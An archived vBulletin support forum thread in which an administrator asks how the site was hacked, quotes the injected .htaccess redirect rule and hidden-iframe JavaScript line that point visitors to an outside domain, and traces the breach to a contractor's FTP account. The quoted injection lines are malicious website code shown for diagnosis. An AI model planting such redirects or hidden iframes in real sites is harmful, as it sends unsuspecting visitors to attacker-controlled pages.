Go Back   vb.org Archive > vBulletin 4 Discussion > vB4 General Discussions

Reply
 
Thread Tools Display Modes
  #1  
Old 01-31-2013, 08:54 AM
eteanga eteanga is offline
 
Join Date: Dec 2010
Posts: 6
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default Looking to dig deeper into how forum was hacked

Hey,

for a second time, our forum has been hacked. The following happens:
  • .htaccess is edited to redirect all queries to another URL
  • Javascript files are appended with iFrame code
  • New .htaccess files are created in all subfolders, redirecting all queries to another URL

The .htaccess file included this new line:
Code:
RewriteRule ^.*$ http://senior-fun-shooters.de/mccd.html?h=XXX [L,R]
iFame code looks like:
Code:
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://senior-fun-shooters.de/mccd.html?j=XXX></iframe>');
Forum technical details:
  • vBulletin 4.2.0 Patch Level 3
  • vbSEO and vbSEO :: Sitemap Generator installed
  • GlowHost - Spam-O-Matic installed

This is the second time this has happened, so I suspect there's a known hack allowing these changes to be made. It could be a server permissions problem on our side too. Do you have any pointers for where this hack is already discussed?
Reply With Quote
  #2  
Old 01-31-2013, 09:17 AM
betterthanyours betterthanyours is offline
 
Join Date: May 2012
Posts: 193
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Are you on dedicated or shared hosting? Sounds like the hosting environment is not secure...
Reply With Quote
  #3  
Old 01-31-2013, 11:14 AM
eteanga eteanga is offline
 
Join Date: Dec 2010
Posts: 6
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

It is on our virtual private server, so we do control the permissions (that's not to say that our permissions are all set correctly...)
Reply With Quote
  #4  
Old 01-31-2013, 11:39 AM
betterthanyours betterthanyours is offline
 
Join Date: May 2012
Posts: 193
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Why don't you start with posting permissions for the directories and also the hosting environment's OS, current security modules installed etc
Reply With Quote
  #5  
Old 01-31-2013, 04:48 PM
eteanga eteanga is offline
 
Join Date: Dec 2010
Posts: 6
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Permissions for the form folder itself, and its subfolders is `drwxr-xr-x`.

It's running on Cent OS Linux. As it's a managed server, I don't have specifics on current securty modules installed.

Is what I mentioned a known security hack?

You are still of the mind that this could be prevented by correct folder permissions, am I right?
Reply With Quote
  #6  
Old 01-31-2013, 05:22 PM
Lynne's Avatar
Lynne Lynne is offline
 
Join Date: Sep 2004
Location: California/Idaho
Posts: 41,180
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Have you checked your server logs to find the IP of the person who did this? Then check your access_logs for that IP and see what they did on your site.
Reply With Quote
  #7  
Old 02-01-2013, 10:00 AM
betterthanyours betterthanyours is offline
 
Join Date: May 2012
Posts: 193
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Do what Lynne said also. Access and server logs will tell you how and what happened. Most website vulnerabilities are due to the host not setting up a secure environment....
Reply With Quote
  #8  
Old 02-01-2013, 01:57 PM
eteanga eteanga is offline
 
Join Date: Dec 2010
Posts: 6
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Thanks for all the advice.

Our Apache logs certainly show the time the 404 responses begun to spring up. However, there does not seem to be more access information than that. I could be wrong, of course, and we'll search the help of an expert in the area of Linux.
Reply With Quote
  #9  
Old 02-04-2013, 10:50 AM
eteanga eteanga is offline
 
Join Date: Dec 2010
Posts: 6
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

I can confirm that this hack took place through FTP access.

That means it was not a mal-configured server or vBulletin's fault.

How the strong FTP password was cracked is another question. It was an account created specfically for a past vBulletin contractor. Either the password was brute-force guessed (which I don't suspect), or the contractor's machine or FTP communication with our server was compromised.
Reply With Quote
  #10  
Old 02-04-2013, 11:35 AM
nhawk nhawk is offline
 
Join Date: Jan 2011
Posts: 1,604
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Lock down FTP access to allow access from only known, trusted IP addresses through your firewall. You should be able to do that through your server control panel.

And actually on a running site that isn't being updated for any reason, there's no reason to allow any FTP access to the server at all.
Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 07:28 PM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.06228 seconds
  • Memory Usage 2,243KB
  • Queries Executed 13 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (2)bbcode_code
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (1)pagenav_pagelink
  • (10)post_thanks_box
  • (10)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (10)post_thanks_postbit_info
  • (10)postbit
  • (10)postbit_onlinestatus
  • (10)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_postinfo_query
  • fetch_postinfo
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • pagenav_page
  • pagenav_complete
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete